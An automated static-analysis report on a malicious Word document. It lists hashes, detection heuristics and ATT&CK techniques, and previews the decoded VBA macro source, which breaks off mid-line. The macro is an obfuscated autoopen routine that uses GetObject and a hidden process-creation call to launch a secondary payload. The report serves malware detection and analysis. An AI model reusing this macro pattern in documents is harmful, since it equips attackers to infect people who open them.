Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 1a1f1531a79a0d79…

MALICIOUS

Office (OLE)

157.9 KB Created: 2019-03-22 14:15:00 Authoring application: Microsoft Office Word First seen: 2019-04-18
MD5: 1cc9fe0345dbb2e288c59021a5fb094e SHA-1: dbd1691eb459ffa2814079753474ab65752f3582 SHA-256: 1a1f1531a79a0d79fa3e30f82919ffc7e7be80f08f467db09db1b9e9edb5690d
222 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. The 'autoopen' macro is present and uses the GetObject function, which is a common technique for executing arbitrary code. This suggests the macro is designed to download and execute a secondary payload. No specific family could be identified.

Heuristics 7

  • ClamAV: Doc.Malware.Dsfj-6905985-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Dsfj-6905985-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 16199 bytes
SHA-256: 71a3aad5210ba1f705290334e375c39f8347fa1e6c9ab023920b14bc08a33ec3
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "McBABo"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "bwAAQQB"
Attribute VB_Base = "0{083E8E4F-7333-4DE3-975C-87E5BE09DE75}{965B932F-2E98-488C-948A-3A0C546735B2}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "FAUADQw"
Sub autoopen()
On Error Resume Next
   If YADACkA = VADxU_GD Then
   jBDB1XA = CVar(qXDokB)
   C1GwDAAD = (101205095 + Rnd(so__AB4 * _
Tan(708947359 / Chr(124755860 / CDbl(wQ1xBA) * L_xZ4DDX / CDbl(604135494)))) * 178624750 * _
Atn(556091245 / Oct(503255865) - 207074283 * Int(z_AAA1QB)) * (534873275 - Atn(RACDDA)))
   BXADoU = Int(zQBDBxQ - _
MAD_GAZ - 412497414 * Int(603344469))
End If
   If ic1AQxBx = LUAQDo Then
   LXXQDDUU = CVar(NQABwD)
   HcAAQAA = (289389406 + Rnd(jAAAUBXw * _
Tan(652224662 / Chr(31746141 / CDbl(XBADQA) * aAXBAAZ / CDbl(303441909)))) * 662885042 * _
Atn(25240853 / Oct(284925518) - 805380599 * Int(E_ABAAAc)) * (706170682 - Atn(zBZAAUX)))
   PDA_GA = Int(dAADGQA1 - _
z_AQBAcA - 257527050 * Int(9699502))
End If
Set zZoAxAUk = GetObject(bwAAQQB.Tag + bwAAQQB.IQ1AGA1Q + bwAAQQB.Tag)
   If oZGAD_ = YAQD4AA1 Then
   LcU1wDZ = CVar(HAkA1AGo)
   i4AQD1 = (79195545 + Rnd(rAAAo_A * _
Tan(158329816 / Chr(548353451 / CDbl(ikUZZC) * NACADXA / CDbl(991010880)))) * 392771888 * _
Atn(225583305 / Oct(609036624) - 996059843 * Int(wAQAAAX)) * (519478883 - Atn(VUQQoA)))
   wGAQoZ = Int(W_DCC_A - _
wCDxkw - 736633072 * Int(586596545))
End If
   If Uw1AQZA = V1A1AA Then
   FBAUCDAA = CVar(awUwUZ)
   L4UAQxX_ = (484367768 + Rnd(l4ADQD * _
Tan(679210699 / Chr(59517750 / CDbl(sB1BUAk) * uQ_oA_ / CDbl(269071862)))) * 51720181 * _
Atn(21031964 / Oct(21990879) - 509919029 * Int(cCcZBkCB)) * (720245876 - Atn(WDQUwk1A)))
   AAwUx4 = Int(iAUCc1 - _
vAcGAADB - 466987491 * Int(540598761))
End If
   If cAoZcA = J1ZQcADk Then
   EAUUUD = CVar(hAkAAAA)
   sQX1kA4 = (358197078 + Rnd(icAUABQ * _
Tan(153325382 / Chr(514242251 / CDbl(XQCQXA) * zDAZAw / CDbl(359149986)))) * 688224264 * _
Atn(692158750 / Oct(979567079) - 677187710 * Int(LxCABA)) * (380328198 - Atn(NQAUAAwQ)))
   rwQAoZc = Int(uBXBxDw - _
GAADAAAX - 855715159 * Int(407982257))
End If
zZoAxAUk.ShowWindow = 738293 - 738293
   If w411DAUx = O_1ZXACw Then
   JXBDQAA = CVar(OBwA4A)
   vU4D_Z = (87960523 + Rnd(loACoD * _
Tan(670751758 / Chr(14397286 / CDbl(oXZABUcD) * GUBQDA / CDbl(825014073)))) * 887450535 * _
Atn(242824506 / Oct(719087240) - 689504271 * Int(mQAGAUw)) * (547162149 - Atn(tADUBQU_)))
   iCxAB4AB = Int(tDAAQAUU - _
wQQUcAAG - 244463446 * Int(125662189))
End If
   If wAQG_Q = KxUDADk Then
   wDAA4ZU = CVar(mAAAAoUk)
   kCD_kDQ = (544439065 + Rnd(iAAADwX * _
Tan(523204940 / Chr(394316748 / CDbl(H4Qx_U_) * j1cZ4Q4o / CDbl(285257778)))) * 283448523 * _
Atn(65358154 / Oct(946572829) - 491506286 * Int(qGxGUG)) * (885913497 - Atn(BBDBAG)))
   VDUDCA = Int(f1wkA4A - _
KAGAAAAQ - 925752717 * Int(467445725))
End If
   If iBQwZXU = MxQxox_ Then
   UBAUQA = CVar(wAAUZCx)
   VZAxA4w = (106169124 + Rnd(VCAABUA * _
Tan(88096912 / Chr(722804815 / CDbl(CoAkA1Bc) * aA_4C4 / CDbl(248778481)))) * 238025100 * _
Atn(265996728 / Oct(12588907) - 602739977 * Int(D_QQAc)) * (465808297 - Atn(mADAcA)))
   UkABAA = Int(tAQB_D - _
fGG_QQxA - 193560848 * Int(204645670))
End If
GetObject(bwAAQQB.Tag + bwAAQQB.QoAcA_ + bwAAQQB.Tag). _
Create bwAAQQB.Tag + bwAAQQB.OUA1wDC + bwAAQQB.Tag + bwAAQQB.RAGC_QU + bwAAQQB.Tag + bwAAQQB.Tag + bwAAQQB.CAZQABBk + bwAAQQB.Tag + bwAAQQB.Tag + bwAAQQB.G1AAUAAA + bwAAQQB.Tag + bwAAQQB.AADA_A + bwAAQQB.Tag, X4AxQU, zZoAxAUk, bwAAQQB.Tag
   If r_UQQxAZ = aGA4cBAX Then
   tAAA1AoA = CVar(noAZAZc)
   GQGUAw = (594065071 + Rnd(jXA1AA * _
Tan(968045264 / Chr(
... (truncated)